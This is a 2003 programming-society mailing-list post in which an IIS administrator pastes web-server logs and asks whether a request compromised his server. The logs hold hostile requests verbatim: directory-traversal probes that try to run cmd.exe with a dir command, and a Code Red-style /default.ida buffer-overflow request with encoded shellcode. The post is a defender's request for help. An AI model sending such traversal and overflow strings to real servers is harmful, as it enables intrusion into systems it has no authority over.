[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[ProgSoc] What happened here...
I am running IIS. Looking at my web logs I see stuff like this all the
time:
2003-01-17 16:39:32 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..Á�../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:38 202.68.145.18 - 192.168.0.200 81 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:40 202.68.145.18 - 192.168.0.200 81 GET
/winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:42 202.68.145.18 - 192.168.0.200 81 GET
/winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:45 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:47 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:50 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:52 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 17:48:48 216.231.32.41 - 192.168.0.200 81 GET / - 400 -
It doesn't really phase me, because I see the 404 error. However, this
morning I found this:
2003-01-17 18:08:56 218.58.34.244 - 192.168.0.200 81 GET /default.ida
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
=a 200 -
Seems to me to be a buffer overflow attack. Unfortunately it also
appears to have returned 200 OK.
I have nfi what this code might do. Any ideas? Am I screwed?
John.
-
You are subscribed to the progsoc mailing list. To unsubscribe, send a
message containing "unsubscribe" to progsoc-request@nospam.progsoc.uts.edu.au.
If you are having trouble, ask owner-progsoc@nospam.progsoc.uts.edu.au for help.